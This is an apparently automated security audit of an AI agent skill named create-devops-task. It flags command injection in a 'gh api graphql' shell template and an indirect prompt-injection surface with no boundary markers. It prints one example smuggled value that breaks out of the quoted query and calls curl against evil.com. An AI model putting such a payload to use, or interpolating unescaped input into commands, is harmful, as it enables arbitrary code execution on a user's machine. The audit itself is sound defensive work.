create-devops-task
Fail
Audited by Gen Agent Trust Hub on Apr 8, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill's workflow instructs the agent to construct shell commands using the GitHub CLI (
gh api graphql) by directly interpolating user-supplied strings into the command arguments. - Evidence: In
SKILL.md, the instructions for creating a draft issue use<title>and<context if any>inside a shell command:gh api graphql -f query='... title: "<title>" ...'. - Risk: If a user provides an input containing shell metacharacters such as single quotes, semicolons, or backticks (e.g.,
Task Title' ; curl http://evil.com ; '), they can break out of the intended GraphQL query and execute arbitrary code on the host machine. - [PROMPT_INJECTION]: The skill exhibits an indirect prompt injection surface by processing untrusted data and using it to perform high-privilege actions via the GitHub API without sanitization or boundary markers.
- Ingestion points: User-provided task titles and optional context/body text in
SKILL.md. - Boundary markers: Absent. There are no instructions to the agent to treat the input as data only or to ignore embedded instructions.
- Capability inventory: The skill utilizes the
ghtool to perform GraphQL mutations, which provides broad access to modify GitHub project boards and potentially other resources depending on the environment's authentication token. - Sanitization: Absent. There is no requirement for the agent to escape, validate, or filter the user input before placing it into the command template.
Recommendations
- AI detected serious security threats
Audit Metadata